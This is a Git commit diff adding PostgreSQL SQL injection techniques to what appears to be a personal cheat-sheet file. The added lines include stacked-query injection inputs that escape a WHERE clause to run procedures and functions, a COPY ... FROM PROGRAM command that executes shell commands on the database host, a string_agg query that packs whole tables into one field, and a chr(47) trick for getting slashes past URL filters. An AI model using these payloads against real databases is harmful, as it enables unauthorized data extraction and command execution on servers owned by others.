Update Postgres_SqlInjecttions.sql

libertyir · Sep 18, 2021 · dfe56b4 · dfe56b4
1 parent 24532ff
commit dfe56b4
Showing 1 changed file with 30 additions and 0 deletions.
diff --git a/Postgres_SqlInjecttions.sql b/Postgres_SqlInjecttions.sql
@@ -45,6 +45,36 @@ select (table_name || ' : ' || (select string_agg(column_name, ',') from informa
 --| table2 : field1                |
 ------------------------------------
 
+--Multiple Select Table in single text
+--*************************************************
+-- Field1 int,field2 text,field3 datetime
+select string_agg(cast(COALESCE(txt1,'')  as text) , '<br>') from (select cast(COALESCE(field1,'0')  as text) || ',' || cast(COALESCE(field2,'')  as text) || ',' || cast(COALESCE(field3,now())  as text) as txt1 from table1) as tbl1
+
+
+--execute command delete/update/exec/function in command 
+--*************************************************
+-- orginal select * from table1 where field1 = $input
+-- $input = '; select 1;exec sp_1; select fn_test(''); --
+
+
+-- orginal select * from (select * from table1 where field1 = $input group by field2)
+-- $input =  group by field2'; select 1;exec sp_1; select fn_test(''); select * from table1 where 1=2 and ''='
+
+
+--Shell Execute
+--*************************************************
+Create table pg_test (cmdr text);
+COPY pg_test (command_output) FROM PROGRAM 'echo 123';
+select cmdr from pg_test
+
+
+--bypass / and \ in url 
+--*************************************************
+select replace('ls !', '!',chr(47))
+
+
+
+